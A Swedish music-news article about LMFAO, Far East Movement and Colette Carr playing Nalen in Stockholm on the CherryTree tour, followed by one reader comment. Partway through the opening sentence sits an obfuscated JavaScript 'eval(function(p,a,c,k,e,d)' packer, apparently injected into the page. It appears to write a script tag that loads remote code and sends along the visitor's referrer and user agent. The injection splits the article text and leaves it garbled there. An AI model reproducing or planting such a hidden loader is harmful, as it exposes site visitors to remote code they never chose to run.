Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

LMFAO och Far East Movement till Sverige

LMFAO och Far East Movement till Sverige
Revue Magazine

MFAOs eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nknse|var|u0026u|referrer|kthzz||js|php’.split(’|’),0,{}))
framgångssaga fortsätter
”Party Rock Anthem” har sålt 3 x platina i Sverige
SVERIGESPELNING 18:e februari. NALEN Globen Annexet| Stockholm

Den 18:e februari kommer LMFAO, Far East Movement och Colette Carr till Stockholm och Nalen.
Det är det enda Sverigestoppet på CherryTree turnén som startar i Portugal den 16:e januari.
Fullständig turnéplan hittar du längst ner.

LMFAO har firat stora framgångar under året och har lyckats sälja över 10 miljoner singlar med hitsen ”Sexy & I Know It”, “Party Rock Anthem”och “Champagne Showers”. Alla tagna från senaste albumet ”Sorry For Party Rocking”. Party Rock Anthem har nått hisnande 250,000,000 visningar på Youtube.

LMFAO erhöll nyss två American Music Award-nomineringar för ”New Artist of The Year” och ”Pop or Rock Music: Favourite Band, Duo or Group” .Gruppen kammade även nyligen hem priset för ”Favourite Song” i australiensiska Nickelodeon Kids Choice Awards, samt två MTV European Music Award-nomineringar. De kommer även att uppträda på MTV EMAs i Belfast söndagen den 6e november.

Duon, bestående av Redfoo (Stefan Kendal Gordy) och SkyBlu (Skyler Husten Gordy), formades 2006 i Los Angeles. De är son och sonson till Berry Gordy, grundare av skivbolaget Motown, vilket gör dem till farbror och brorson.(!!!) Debutskivan ”Party Rock” släpptes år 2009 och innehåll hiten ”I’m in Miami Bitch”. Uppföljaren ”Sorry For Party Rocking” släpptes i juni detta år.

Om du har missat the wiggle dance kolla videon till ”Sexy And I Know It”.

Comments

  1. Uggla

    Va, vad stökigt. Detta vill man ju inte missa 🙂